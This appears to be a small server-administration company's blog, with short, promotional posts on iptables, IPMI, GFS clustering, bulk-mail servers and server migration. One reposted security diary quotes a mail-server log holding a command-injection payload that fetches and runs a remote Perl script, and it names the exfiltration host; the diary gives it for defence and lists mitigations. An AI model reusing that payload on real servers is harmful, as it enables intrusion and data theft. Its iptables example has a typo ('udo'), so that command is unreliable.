Rack Admins

This example block all UDP incoming packets except port number 27005.:

iptables -A INPUT -p udp --dport 27005 -j ACCEPT
iptables -A INPUT -p udp -i lo -j ACCEPT #You may ignore this rule
iptables -A INPUT -p udo -s 0/0 -j DROP

Popularity: 20% [?]

If you want fast and easy transfer server as image to cloud hosting the best solution is create system files as ISO image and backup all user data by tar.

But you never can’t create system ISO in multiuser runlevel, becouse some files open by system and some files may changed in create ISO process.

Another way – order KVM, reboot server in single mode and create system ISO. But… how about is KVM unavalible?

We suggest use initrd with busybox and ssh support. Just reboot server and login to ssh. You may mount partitions, run commands and do anything – by ssh in single use mode.

If you want got this initrd – order us for this task, it cost from 60$ and up.

[si-contact-form form='2']

Popularity: unranked [?]

GFS Cluster is good thing. It simple and robust: If first node down, secondary replace it.

But… Did you know about GFS work? It write all data beetween servers via network connection. Usually servers connect via 1Gbps – it is 128Mb per second. Sounds good? Please hold on! This is a RAW bandwith. TCP/IP connection take 5%. GFS take 10%.

Well, 100mb per second sound good, but one second! GFS is a beedirectional protocol such like DRBD. So, it split channel twiced – 50mb per second.

And now check – did you MySQL will work nice for that drive speed? Of course Not!

But we have uniqe techniqe for solution this problem: Use secondary node as dedicated network block device. It avoid spliting channel and you got full 100mb per second.

Sounds good, yea?

[si-contact-form form='2']

Popularity: 3% [?]

Install Mail Marketing Script not difficult task, but you will know some rules:

• Setup Linux Server for only MTA task. Disable a lot of unused services like as cups or samba.
• Double check for closed relay for unauthentication emails. Open relay – direct way to Black List.
• Keep server load – it will not more than CPU’s count. For Dual Core – not more than 2 LA for example.

Did you know?

Server can sent 12Mbps mail for each CPU core. Each 12Mbps request another CPU core. Yes, hyperthreading support for this count. For full 100mbps you ned 4 CPU core with hyperthreading.

You may use RRDNS for speedup mail sending.  It used for multiple servers and balanced (cluster) MTA.

For Guranteed Delivery to free mail server (Yahoo,Hotmail,Google,etc) you need use:

1. Valid PTR Record
2. Domain Keys
3. SPF DNS Record

You may order server setup for 120$.

[si-contact-form form='2']

Popularity: 2% [?]

The ipmi_si need special parameters for loading. This was tested on a 2.6.10 kernel.

It does not work with the 2.6.9-1.667(smp) kernel in the FC3 package.

modprobe ipmi_si type=kcs ports=0xca8 si_regspacings=4.

Once these modules are up and running, start the smagent.

 $ smagent &

Use the IPMIview Java utility from the remote system to access the IPMI card. Since IPMI is designed to be OS transparent, this utility does not need any modules to be installed in the kernel. If this configuration does not work, run IPMIview in the same LAN and configure the gateway MAC and IP .

The IPMIview tool allows power shutdown, reset, and device monitoring. The IPMI console redirection did not work though everything seemed to be configured properly. The BIOS on the P8SCi is supposed to detect the IPMI card automatically and set the console redirection options for it. Unfortunately, we were still seeing garbage in the remote console.

The current BIOS version of 1.1 shows the redirection going to “NULL” instead of something understandable like IPMI, COM1, etc.

The solution was to get the latest P8SCI BIOS firmware (rev1.1) and re-flash it on the managed system. We had to do this even though the current BIOS on the board indictated it was already version 1.1.

Popularity: 100% [?]

Sometime you may got strange problem. Server partition, usually /var or /tmp went to read only.

Some peoples suggest you unmount that partition and use main (root) partiton for place this directory. This is very big mistake!

Partition become to read only if you got some fiilesystem errors. It may be software or hardware problem.

and since the partition is mounted on the main disk it needs to be replaced, so i need someone to perform the following work:

The cure is not to easy:

1. Detect what same cause this error – software or hardware
2. Software problems cure tune2fs and kernel upgrade
3. Hardware problems cure drive replacement

But really disaster problem – error on drive contorl or main board. So, drive replacment not help you. We suggest migrate server to new one. We can do it for you. Zero downtime guranteed:

Backup of the all accounts.
Once the datacenter sent access to new server we configure WHM/Cpanel or other Hosting Panel.
Restore of the all accounts to new server.
Check Apache & MySQL conditions.
Redirect all traffick from old to new one.
Cange DNS settings.

We use our know-how for traffick redirection. It absolutly transparent!
[si-contact-form form='2']

Popularity: unranked [?]

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
table; from=<blue@attacker.com> to=<root+:|wget
hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin’s milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 — this host appears to be unreachable at the moment though.

Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136

Alternatively, don’t use the -x option when running this plugin, as well do not run it as root.

http://isc.sans.org/diary.html?storyid=8434

Popularity: 8% [?]

As is known, the standard method of working with apache php – mod_php, also known as DSO, has a maximum output, but all scripts run under the user apache.

To solve this problem in a easyapache mode php fcgi, which are not always compatible with custom php scripts, because he works in cgi mode, and environment variables in apache not be available. This apply for engines to banner systems, etc.

The problem is fully resolved mode of operation called apache mpm-itk, where each process is inherited virtualhost with user privileges. It also gives full play to monitor the resources used, monitoring of consumption and limits.

Try running easyapache and look for mpm-itk. Not found? True, it’s not there. Developer WHM / cPanel ignores this option. But if you want – we can set you on the server with WHM / cPanel apache mode mpm-itk. Yes, we can do is our know-how. Nobody will configure mpm-itk with easyapache, since it is impossible. Only Rack Admins can do it!

Popularity: 55% [?]